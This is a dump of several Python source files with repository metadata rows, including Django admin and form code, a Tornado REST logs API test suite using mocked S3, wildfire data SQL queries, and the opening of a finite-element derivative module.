| 51.617204 | 137 | 0.694234 | 2,486 | 24,002 | 6.256637 | 0.048673 | 0.038061 | 0.065707 | 0.079787 | 0.949788 | 0.947988 | 0.939308 | 0.91102 | 0.864408 | 0.835348 | 0 | 0.010109 | 0.237564 | 24,002 | 464 | 138 | 51.728448 | 0.839836 | 0.047579 | 0 | 0.618812 | 1 | 0 | 0.083454 | 0.053599 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069307 | false | 0 | 0.009901 | 0.032178 | 0.118812 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
af08353f80f8ea7a9c743ec331779c9c3d84f0da | 1,474 | py | Python | tests/test_reports.py | agrc/reporter | 277f14a477b9c68cec090a8a7f7f522c1dd719f0 | [
"MIT"
] | null | null | null | tests/test_reports.py | agrc/reporter | 277f14a477b9c68cec090a8a7f7f522c1dd719f0 | [
"MIT"
] | 8 | 2020-09-28T16:45:45.000Z | 2020-10-22T14:53:17.000Z | tests/test_reports.py | agrc/reporter | 277f14a477b9c68cec090a8a7f7f522c1dd719f0 | [
"MIT"
] | null | null | null | from reporter import reports
# def test_AGOL_create_report_itemid_not_in_metatable()
def test_AGOL_create_report_call_with_metatable_info(mocker):
mock_object = mocker.Mock()
mock_org = mocker.patch('reporter.tools.Organization')
item = mocker.Mock()
item.itemid = 'foo'
mock_org.get_feature_services_in_folders.return_value = [(item, 'folder1')]
mock_org.get_open_data_groups.return_value = ['Open Data Group']
mock_metatable = mocker.patch('reporter.tools.Metatable')
mock_row = mocker.Mock()
mock_row.category = 'Test Category'
mock_metatable.metatable_dict = {'foo': mock_row}
reports.AGOLUsageReport.create_report(mock_object)
assert mock_org.get_item_info.called_with(item, ['Open Data Group'], 'folder1', 'Test Category')
def test_AGOL_create_report_call_without_metatable_info(mocker):
mock_object = mocker.Mock()
mock_org = mocker.patch('reporter.tools.Organization')
item = mocker.Mock()
item.itemid = 'foo'
mock_org.get_feature_services_in_folders.return_value = [(item, 'folder1')]
mock_org.get_open_data_groups.return_value = ['Open Data Group']
mock_metatable = mocker.patch('reporter.tools.Metatable')
mock_row = mocker.Mock()
mock_row.category = 'Test Category'
mock_metatable.metatable_dict = {'bar': mock_row}
reports.AGOLUsageReport.create_report(mock_object)
assert mock_org.get_item_info.called_with(item, ['Open Data Group'], 'folder1', None)
| 35.095238 | 100 | 0.747626 | 198 | 1,474 | 5.207071 | 0.227273 | 0.077595 | 0.058196 | 0.093113 | 0.924345 | 0.902037 | 0.849661 | 0.849661 | 0.849661 | 0.849661 | 0 | 0.003157 | 0.140434 | 1,474 | 41 | 101 | 35.95122 | 0.810576 | 0.035957 | 0 | 0.740741 | 0 | 0 | 0.169838 | 0.071882 | 0 | 0 | 0 | 0 | 0.074074 | 1 | 0.074074 | false | 0 | 0.037037 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bbc6b7b7d84b1980948206284afc362ede5ed460 | 137 | py | Python | calendars/admin.py | orlowdev/aite | 6fcb02211d9fcb6be84de99deebc2aabe8075f61 | [
"Apache-2.0"
] | 1 | 2021-04-13T15:44:05.000Z | 2021-04-13T15:44:05.000Z | calendars/admin.py | orlowdev/aite | 6fcb02211d9fcb6be84de99deebc2aabe8075f61 | [
"Apache-2.0"
] | null | null | null | calendars/admin.py | orlowdev/aite | 6fcb02211d9fcb6be84de99deebc2aabe8075f61 | [
"Apache-2.0"
] | null | null | null | from django.contrib import admin
from calendars.models import Event, Calendar
admin.site.register(Calendar)
admin.site.register(Event)
| 19.571429 | 44 | 0.824818 | 19 | 137 | 5.947368 | 0.578947 | 0.230089 | 0.300885 | 0.442478 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094891 | 137 | 6 | 45 | 22.833333 | 0.91129 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
3c2de69087b34c4d34e9fbff445a75fde933f2ce | 915 | py | Python | events/forms.py | maxweis/Web-App | f2df73bbc6da88d2d42713de9b72b0d1a799db6e | [
"Apache-2.0"
] | 2 | 2019-03-26T17:43:16.000Z | 2019-04-01T01:18:16.000Z | events/forms.py | maxweis/Web-App | f2df73bbc6da88d2d42713de9b72b0d1a799db6e | [
"Apache-2.0"
] | 1 | 2019-03-29T11:33:56.000Z | 2019-03-29T11:33:56.000Z | events/forms.py | maxweis/Resumania | f2df73bbc6da88d2d42713de9b72b0d1a799db6e | [
"Apache-2.0"
] | null | null | null | from django import forms
from django.forms import ModelForm
from bootstrap_datepicker_plus import DateTimePickerInput
from .models import Event
class EventCreationForm(ModelForm):
name = forms.CharField(max_length=64)
time_begin = forms.DateTimeField(widget=DateTimePickerInput)
time_end = forms.DateTimeField(widget=DateTimePickerInput)
place = forms.CharField(max_length=64)
class Meta(ModelForm):
model = Event
fields = ('name', 'time_begin', 'time_end', 'place')
exclude = ['rso']
class EditEventForm(ModelForm):
name = forms.CharField(max_length=64)
time_begin = forms.DateTimeField(widget=DateTimePickerInput)
time_end = forms.DateTimeField(widget=DateTimePickerInput)
place = forms.CharField(max_length=64)
class Meta(ModelForm):
model = Event
fields = ('name', 'time_begin', 'time_end', 'place')
exclude = ['rso'] | 35.192308 | 64 | 0.71694 | 101 | 915 | 6.356436 | 0.29703 | 0.087227 | 0.105919 | 0.143302 | 0.744548 | 0.744548 | 0.744548 | 0.744548 | 0.744548 | 0.744548 | 0 | 0.010667 | 0.180328 | 915 | 26 | 65 | 35.192308 | 0.845333 | 0 | 0 | 0.727273 | 0 | 0 | 0.065502 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.181818 | 0 | 0.727273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
3c447d1247890a297054bf59d4a2cd8161bd9bd4 | 115 | py | Python | notebooks/modules/arcface/__init__.py | AgRenaud/Vector-Based-Image-Recognition-API | dba53672e018bee5d1ec506e74ed64cd310afdc4 | [
"Apache-2.0"
] | 3 | 2021-11-21T21:50:09.000Z | 2021-11-24T07:35:07.000Z | notebooks/modules/arcface/__init__.py | AgRenaud/optical-character-recognition | dba53672e018bee5d1ec506e74ed64cd310afdc4 | [
"Apache-2.0"
] | 1 | 2021-11-24T11:35:49.000Z | 2021-11-24T12:13:08.000Z | notebooks/modules/arcface/__init__.py | AgRenaud/optical-character-recognition | dba53672e018bee5d1ec506e74ed64cd310afdc4 | [
"Apache-2.0"
] | null | null | null | from modules.arcface.ArcFaceBlock import ArcFaceBlock
from modules.arcface.loss import arcface_loss as ArcFaceLoss
| 38.333333 | 60 | 0.878261 | 15 | 115 | 6.666667 | 0.533333 | 0.22 | 0.36 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086957 | 115 | 2 | 61 | 57.5 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
3c8987d2dab4bf35dd695a6d297e78fa57cc0342 | 189 | py | Python | sales/admin.py | GeekGuste/ecommerce-nuxtjs-djoser | 3ee49307eee0e8829504d6dc485fc163e94f18be | [
"MIT"
] | null | null | null | sales/admin.py | GeekGuste/ecommerce-nuxtjs-djoser | 3ee49307eee0e8829504d6dc485fc163e94f18be | [
"MIT"
] | null | null | null | sales/admin.py | GeekGuste/ecommerce-nuxtjs-djoser | 3ee49307eee0e8829504d6dc485fc163e94f18be | [
"MIT"
] | null | null | null | from django.contrib import admin
from sales.models import Product
from sales.models import Category
# Register your models here.
admin.site.register(Category)
admin.site.register(Product)
| 23.625 | 33 | 0.825397 | 27 | 189 | 5.777778 | 0.481481 | 0.115385 | 0.192308 | 0.269231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10582 | 189 | 7 | 34 | 27 | 0.923077 | 0.137566 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
3c9731bfdb35e8180b54ebf66e3d195c221ec86f | 16,386 | py | Python | tests/server/rest/logs_test.py | WIPACrepo/iceprod | 83615da9b0e764bc2498ac588cc2e2b3f5277235 | [
"MIT"
] | 2 | 2017-01-23T17:12:41.000Z | 2019-01-14T13:38:17.000Z | tests/server/rest/logs_test.py | WIPACrepo/iceprod | 83615da9b0e764bc2498ac588cc2e2b3f5277235 | [
"MIT"
] | 242 | 2016-05-09T18:46:51.000Z | 2022-03-31T22:02:29.000Z | tests/server/rest/logs_test.py | WIPACrepo/iceprod | 83615da9b0e764bc2498ac588cc2e2b3f5277235 | [
"MIT"
] | 2 | 2017-03-27T09:13:40.000Z | 2019-01-27T10:55:30.000Z | """
Test script for REST/logs
"""
import logging
logger = logging.getLogger('rest_logs_test')
import os
import sys
import time
import random
import shutil
import tempfile
import unittest
import subprocess
import json
from functools import partial
from unittest.mock import patch, MagicMock
import string
from tests.util import unittest_reporter, glob_tests
import tornado.web
import tornado.ioloop
from tornado.httputil import url_concat
from tornado.httpclient import AsyncHTTPClient, HTTPError
from tornado.testing import AsyncTestCase
import boto3
from moto import mock_s3
from rest_tools.server import Auth, RestServer
from iceprod.server.modules.rest_api import setup_rest
import iceprod.server.rest.logs
from . import RestTestCase
def fake_data(N):
return ''.join(random.choices(string.printable, k=N))
class rest_logs_test(RestTestCase):
def setUp(self):
config = {'rest':{'logs':{}}}
super(rest_logs_test,self).setUp(config=config)
@unittest_reporter(name='REST POST /logs')
def test_100_logs(self):
client = AsyncHTTPClient()
data = {'data':'foo bar baz'}
r = yield client.fetch('http://localhost:%d/logs'%self.port,
method='POST', body=json.dumps(data),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 201)
ret = json.loads(r.body)
log_id = ret['result']
@unittest_reporter(name='REST GET /logs')
def test_105_logs(self):
client = AsyncHTTPClient()
data = {'name': 'stdlog', 'data': 'foo bar baz'}
r = yield client.fetch('http://localhost:%d/logs'%self.port,
method='POST', body=json.dumps(data),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 201)
ret = json.loads(r.body)
log_id = ret['result']
r = yield client.fetch('http://localhost:%d/logs'%self.port,
method='GET',
headers={'Authorization': 'bearer '+self.token})
ret = json.loads(r.body)
self.assertIn(log_id, ret)
self.assertEqual(len(ret), 1)
for k in data:
self.assertIn(k, ret[log_id])
self.assertEqual(data[k], ret[log_id][k])
args = {'name': 'stdlog', 'keys': 'log_id|name|data'}
r = yield client.fetch(url_concat('http://localhost:%d/logs'%self.port, args),
method='GET',
headers={'Authorization': 'bearer '+self.token})
ret = json.loads(r.body)
self.assertIn(log_id, ret)
@unittest_reporter(name='REST GET /logs/<log_id>')
def test_110_logs(self):
client = AsyncHTTPClient()
data = {'data':'foo bar baz'}
r = yield client.fetch('http://localhost:%d/logs'%self.port,
method='POST', body=json.dumps(data),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 201)
ret = json.loads(r.body)
log_id = ret['result']
r = yield client.fetch('http://localhost:%d/logs/%s'%(self.port,log_id),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 200)
ret = json.loads(r.body)
self.assertEqual(data['data'], ret['data'])
@unittest_reporter(name='REST POST /datasets/<dataset_id>/logs')
def test_120_logs(self):
client = AsyncHTTPClient()
data = {'data':'foo bar baz'}
r = yield client.fetch('http://localhost:%d/datasets/12345/logs'%self.port,
method='POST', body=json.dumps(data),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 201)
ret = json.loads(r.body)
log_id = ret['result']
@unittest_reporter(name='REST GET /datasets/<dataset_id>/logs/<log_id>')
def test_130_logs(self):
client = AsyncHTTPClient()
data = {'dataset_id':'12345','data':'foo bar baz'}
r = yield client.fetch('http://localhost:%d/logs'%self.port,
method='POST', body=json.dumps(data),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 201)
ret = json.loads(r.body)
log_id = ret['result']
r = yield client.fetch('http://localhost:%d/datasets/12345/logs/%s'%(self.port,log_id),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 200)
ret = json.loads(r.body)
self.assertEqual(data['data'], ret['data'])
@unittest_reporter(name='REST GET /datasets/<dataset_id>/tasks/<task_id>/logs')
def test_140_logs(self):
client = AsyncHTTPClient()
data = {'data':'foo', 'dataset_id': 'foo', 'task_id': 'bar', 'name': 'stdout'}
r = yield client.fetch('http://localhost:%d/logs'%self.port,
method='POST', body=json.dumps(data),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 201)
ret = json.loads(r.body)
log_id = ret['result']
r = yield client.fetch('http://localhost:%d/datasets/foo/tasks/bar/logs'%(self.port,),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 200)
ret = json.loads(r.body)
self.assertIn('logs', ret)
self.assertEqual(len(ret['logs']), 1)
self.assertEqual(ret['logs'][0]['log_id'], log_id)
self.assertEqual(data['data'], ret['logs'][0]['data'])
# now try for groupings
data = {'data':'bar', 'dataset_id': 'foo', 'task_id': 'bar', 'name': 'stderr'}
r = yield client.fetch('http://localhost:%d/logs'%self.port,
method='POST', body=json.dumps(data),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 201)
data = {'data':'baz', 'dataset_id': 'foo', 'task_id': 'bar', 'name': 'stdout'}
r = yield client.fetch('http://localhost:%d/logs'%self.port,
method='POST', body=json.dumps(data),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 201)
r = yield client.fetch('http://localhost:%d/datasets/foo/tasks/bar/logs?group=true'%(self.port,),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 200)
ret = json.loads(r.body)
self.assertIn('logs', ret)
logging.debug('logs: %r', ret['logs'])
self.assertEqual(len(ret['logs']), 2)
self.assertEqual('baz', ret['logs'][0]['data'])
self.assertEqual('bar', ret['logs'][1]['data'])
# now check order, num, and keys
r = yield client.fetch('http://localhost:%d/datasets/foo/tasks/bar/logs?order=asc&num=1&keys=log_id|data'%(self.port,),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 200)
ret = json.loads(r.body)
self.assertIn('logs', ret)
logging.debug('logs: %r', ret['logs'])
self.assertEqual(len(ret['logs']), 1)
self.assertEqual(ret['logs'][0]['log_id'], log_id)
self.assertEqual('foo', ret['logs'][0]['data'])
self.assertCountEqual(['log_id','data'], list(ret['logs'][0].keys()))
class rest_logs_test2(RestTestCase):
def setUp(self):
config = {
'rest':{
'logs':{},
},
's3': {
'access_key': 'XXX',
'secret_key': 'XXX',
},
}
super(rest_logs_test2,self).setUp(config=config)
@mock_s3
@unittest_reporter(name='REST POST /logs - S3')
def test_200_logs(self):
conn = boto3.resource('s3', region_name='us-east-1')
conn.create_bucket(Bucket='iceprod2-logs')
client = AsyncHTTPClient()
data = {'data':fake_data(2000000)}
r = yield client.fetch('http://localhost:%d/logs'%self.port,
method='POST', body=json.dumps(data),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 201)
ret = json.loads(r.body)
log_id = ret['result']
body = conn.Object('iceprod2-logs', log_id).get()['Body'].read().decode('utf-8')
self.assertEqual(body, data['data'])
data = {'data':fake_data(200000)}
r = yield client.fetch('http://localhost:%d/logs'%self.port,
method='POST', body=json.dumps(data),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 201)
ret = json.loads(r.body)
log_id = ret['result']
with self.assertRaises(Exception):
conn.Object('iceprod2-logs', log_id).get()
@mock_s3
@unittest_reporter(name='REST GET /logs/<log_id> - S3')
def test_210_logs(self):
conn = boto3.resource('s3', region_name='us-east-1')
conn.create_bucket(Bucket='iceprod2-logs')
client = AsyncHTTPClient()
data = {'data':fake_data(2000000)}
r = yield client.fetch('http://localhost:%d/logs'%self.port,
method='POST', body=json.dumps(data),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 201)
ret = json.loads(r.body)
log_id = ret['result']
body = conn.Object('iceprod2-logs', log_id).get()['Body'].read().decode('utf-8')
self.assertEqual(body, data['data'])
r = yield client.fetch('http://localhost:%d/logs/%s'%(self.port,log_id),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 200)
ret = json.loads(r.body)
self.assertEqual(data['data'], ret['data'])
data = {'data':fake_data(200000)}
r = yield client.fetch('http://localhost:%d/logs'%self.port,
method='POST', body=json.dumps(data),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 201)
ret = json.loads(r.body)
log_id = ret['result']
with self.assertRaises(Exception):
conn.Object('iceprod2-logs', log_id).get()
r = yield client.fetch('http://localhost:%d/logs/%s'%(self.port,log_id),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 200)
ret = json.loads(r.body)
self.assertEqual(data['data'], ret['data'])
@mock_s3
@unittest_reporter(name='REST POST /datasets/<dataset_id>/logs - S3')
def test_220_logs(self):
conn = boto3.resource('s3', region_name='us-east-1')
conn.create_bucket(Bucket='iceprod2-logs')
client = AsyncHTTPClient()
data = {'data':fake_data(2000000)}
r = yield client.fetch('http://localhost:%d/datasets/12345/logs'%self.port,
method='POST', body=json.dumps(data),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 201)
ret = json.loads(r.body)
log_id = ret['result']
body = conn.Object('iceprod2-logs', log_id).get()['Body'].read().decode('utf-8')
self.assertEqual(body, data['data'])
data = {'data':fake_data(200000)}
r = yield client.fetch('http://localhost:%d/datasets/12345/logs'%self.port,
method='POST', body=json.dumps(data),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 201)
ret = json.loads(r.body)
log_id = ret['result']
with self.assertRaises(Exception):
conn.Object('iceprod2-logs', log_id).get()
@mock_s3
@unittest_reporter(name='REST GET /datasets/<dataset_id>/logs/<log_id> - S3')
def test_230_logs(self):
conn = boto3.resource('s3', region_name='us-east-1')
conn.create_bucket(Bucket='iceprod2-logs')
client = AsyncHTTPClient()
data = {'dataset_id':'12345','data':fake_data(2000000)}
r = yield client.fetch('http://localhost:%d/logs'%self.port,
method='POST', body=json.dumps(data),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 201)
ret = json.loads(r.body)
log_id = ret['result']
body = conn.Object('iceprod2-logs', log_id).get()['Body'].read().decode('utf-8')
self.assertEqual(body, data['data'])
r = yield client.fetch('http://localhost:%d/datasets/12345/logs/%s'%(self.port,log_id),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 200)
ret = json.loads(r.body)
self.assertEqual(data['data'], ret['data'])
data = {'dataset_id':'12345','data':fake_data(200000)}
r = yield client.fetch('http://localhost:%d/logs'%self.port,
method='POST', body=json.dumps(data),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 201)
ret = json.loads(r.body)
log_id = ret['result']
with self.assertRaises(Exception):
conn.Object('iceprod2-logs', log_id).get()
r = yield client.fetch('http://localhost:%d/datasets/12345/logs/%s'%(self.port,log_id),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 200)
ret = json.loads(r.body)
self.assertEqual(data['data'], ret['data'])
@mock_s3
@unittest_reporter(name='REST GET /datasets/<dataset_id>/tasks/<task_id>/logs - S3')
def test_240_logs(self):
conn = boto3.resource('s3', region_name='us-east-1')
conn.create_bucket(Bucket='iceprod2-logs')
client = AsyncHTTPClient()
data = {'data':fake_data(2000000), 'dataset_id': 'foo', 'task_id': 'bar'}
r = yield client.fetch('http://localhost:%d/logs'%self.port,
method='POST', body=json.dumps(data),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 201)
ret = json.loads(r.body)
log_id = ret['result']
body = conn.Object('iceprod2-logs', log_id).get()['Body'].read().decode('utf-8')
self.assertEqual(body, data['data'])
r = yield client.fetch('http://localhost:%d/datasets/foo/tasks/bar/logs'%(self.port,),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 200)
ret = json.loads(r.body)
self.assertIn('logs', ret)
self.assertEqual(len(ret['logs']), 1)
self.assertEqual(ret['logs'][0]['log_id'], log_id)
self.assertEqual(data['data'], ret['logs'][0]['data'])
data = {'data':fake_data(200000), 'dataset_id': 'foo', 'task_id': 'bar'}
r = yield client.fetch('http://localhost:%d/logs'%self.port,
method='POST', body=json.dumps(data),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 201)
ret = json.loads(r.body)
log_id = ret['result']
with self.assertRaises(Exception):
conn.Object('iceprod2-logs', log_id).get()
r = yield client.fetch('http://localhost:%d/datasets/foo/tasks/bar/logs?order=asc'%(self.port,),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 200)
ret = json.loads(r.body)
self.assertIn('logs', ret)
self.assertEqual(len(ret['logs']), 2)
self.assertEqual(ret['logs'][1]['log_id'], log_id)
self.assertEqual(data['data'], ret['logs'][1]['data'])
def load_tests(loader, tests, pattern):
suite = unittest.TestSuite()
alltests = glob_tests(loader.getTestCaseNames(rest_logs_test))
suite.addTests(loader.loadTestsFromNames(alltests,rest_logs_test))
alltests = glob_tests(loader.getTestCaseNames(rest_logs_test2))
suite.addTests(loader.loadTestsFromNames(alltests,rest_logs_test2))
return suite
| 41.588832 | 128 | 0.576041 | 1,982 | 16,386 | 4.680626 | 0.084258 | 0.092163 | 0.040099 | 0.056807 | 0.868276 | 0.849844 | 0.838418 | 0.790773 | 0.782473 | 0.777083 | 0 | 0.024645 | 0.25711 | 16,386 | 393 | 129 | 41.694656 | 0.737452 | 0.004821 | 0 | 0.711246 | 0 | 0.00304 | 0.201257 | 0.013329 | 0 | 0 | 0 | 0 | 0.215805 | 1 | 0.045593 | false | 0 | 0.075988 | 0.00304 | 0.133739 | 0.00304 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
593409c87bd3bfd9a6a3219d97dc7c10b8408e0d | 3,897 | py | Python | experiments/all_col_queries.py | eerichmond/ml-wildfire-prediction | 7b0fa66389f8429856896ccaf600c72c357272db | [
"CC0-1.0"
] | null | null | null | experiments/all_col_queries.py | eerichmond/ml-wildfire-prediction | 7b0fa66389f8429856896ccaf600c72c357272db | [
"CC0-1.0"
] | null | null | null | experiments/all_col_queries.py | eerichmond/ml-wildfire-prediction | 7b0fa66389f8429856896ccaf600c72c357272db | [
"CC0-1.0"
] | null | null | null | import pandas as pd
import sqlite3
def get_no_fires_df():
conn = sqlite3.connect('../data/fires.sqlite')
no_fires_df = pd.read_sql_query(f"""
select
weather_geo.long,
weather_geo.lat,
weather_geo.month,
strftime('%s', weather_geo.date) as date,
weather_geo.precipitation,
weather_geo.pressure,
weather_geo.humidity_2m,
weather_geo.temp_2m,
weather_geo.temp_dew_point_2m,
weather_geo.temp_wet_bulb_2m,
weather_geo.temp_max_2m,
weather_geo.temp_min_2m,
weather_geo.temp_range_2m,
weather_geo.temp_0m,
weather_geo.wind_10m,
weather_geo.wind_max_10m,
weather_geo.wind_min_10m,
weather_geo.wind_range_10m,
weather_geo.wind_50m,
weather_geo.wind_max_50m,
weather_geo.wind_min_50m,
weather_geo.wind_range_50m,
weather_geo.drought_score,
soil.elevation,
soil.slope_005,
soil.slope_005_02,
soil.slope_02_05,
soil.slope_05_10,
soil.slope_10_15,
soil.slope_15_30,
soil.slope_30_45,
soil.slope_45,
soil.aspect_north,
soil.aspect_east,
soil.aspect_south,
soil.aspect_west,
soil.water_land,
soil.barren_land,
soil.urban_land,
soil.grass_land,
soil.forest_land,
soil.partial_cultivated_land,
soil.irrigated_land,
soil.cultivated_land,
soil.nutrient,
soil.rooting,
soil.oxygen,
soil.excess_salts,
soil.toxicity,
soil.workability,
prior_fire_0_1_year,
prior_fire_1_2_year,
prior_fire_2_3_year,
prior_fire_3_4_year,
prior_fire_4_5_year,
'' as fire_size_class
from weather_geo_no_fire_100k as weather_geo
inner join soil_geo as soil
on soil.long = weather_geo.long
and soil.lat = weather_geo.lat
""", conn)
conn.close()
return no_fires_df
def get_fires_df():
conn = sqlite3.connect('../data/fires.sqlite')
fires_df = pd.read_sql_query("""
select
weather_geo.long,
weather_geo.lat,
weather_geo.month,
strftime('%s', weather_geo.date) as date,
weather_geo.precipitation,
weather_geo.pressure,
weather_geo.humidity_2m,
weather_geo.temp_2m,
weather_geo.temp_dew_point_2m,
weather_geo.temp_wet_bulb_2m,
weather_geo.temp_max_2m,
weather_geo.temp_min_2m,
weather_geo.temp_range_2m,
weather_geo.temp_0m,
weather_geo.wind_10m,
weather_geo.wind_max_10m,
weather_geo.wind_min_10m,
weather_geo.wind_range_10m,
weather_geo.wind_50m,
weather_geo.wind_max_50m,
weather_geo.wind_min_50m,
weather_geo.wind_range_50m,
weather_geo.drought_score,
soil.elevation,
soil.slope_005,
soil.slope_005_02,
soil.slope_02_05,
soil.slope_05_10,
soil.slope_10_15,
soil.slope_15_30,
soil.slope_30_45,
soil.slope_45,
soil.aspect_north,
soil.aspect_east,
soil.aspect_south,
soil.aspect_west,
soil.water_land,
soil.barren_land,
soil.urban_land,
soil.grass_land,
soil.forest_land,
soil.partial_cultivated_land,
soil.irrigated_land,
soil.cultivated_land,
soil.nutrient,
soil.rooting,
soil.oxygen,
soil.excess_salts,
soil.toxicity,
soil.workability,
fires_rollup.prior_fire_0_1_year,
fires_rollup.prior_fire_1_2_year,
fires_rollup.prior_fire_2_3_year,
fires_rollup.prior_fire_3_4_year,
fires_rollup.prior_fire_4_5_year,
fires_rollup.fire_size_class
from weather_geo
inner join soil_geo as soil
on soil.long = weather_geo.long
and soil.lat = weather_geo.lat
inner join fires_rollup
on fires_rollup.date = weather_geo.date
and fires_rollup.long = weather_geo.long
and fires_rollup.lat = weather_geo.lat
and fires_rollup.cause in ('Other causes', 'Natural', 'Power', 'Recreation')
""", conn)
conn.close()
return fires_df
def get_df():
return pd.concat([get_no_fires_df(), get_fires_df()], axis=0).sample(frac=1)
| 24.980769 | 80 | 0.717475 | 596 | 3,897 | 4.266779 | 0.17953 | 0.220212 | 0.088085 | 0.088085 | 0.865513 | 0.780967 | 0.747149 | 0.747149 | 0.71569 | 0.71569 | 0 | 0.043367 | 0.195278 | 3,897 | 155 | 81 | 25.141935 | 0.767538 | 0 | 0 | 0.797203 | 0 | 0 | 0.891712 | 0.299974 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020979 | false | 0 | 0.013986 | 0.006993 | 0.055944 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
5958ec46615e569a87846fda59063c9357789d33 | 27,292 | py | Python | functions_deriv.py | TOPDyn/TOPDyn | 27f5d2e025de99f14e755dd377e8177e24aa87b2 | [
"MIT"
] | 9 | 2020-12-09T12:56:02.000Z | 2021-07-07T14:48:24.000Z | functions_deriv.py | TOPDyn/TOPDyn | 27f5d2e025de99f14e755dd377e8177e24aa87b2 | [
"MIT"
] | null | null | null | functions_deriv.py | TOPDyn/TOPDyn | 27f5d2e025de99f14e755dd377e8177e24aa87b2 | [
"MIT"
] | 3 | 2020-12-08T21:52:54.000Z | 2020-12-10T22:32:38.000Z | import functions_2d as fc
import cmath
import numpy as np
from scipy.sparse.linalg import spsolve
def lambda_local_ep(ngl, ind_passive, passive_el, disp_vector, dyna_stif, coord, connect, E, v, rho):
""" Calculates the lambda parameter of the local elastic potential energy function.
Args:
ngl (:obj:`int`): Degrees of freedom.
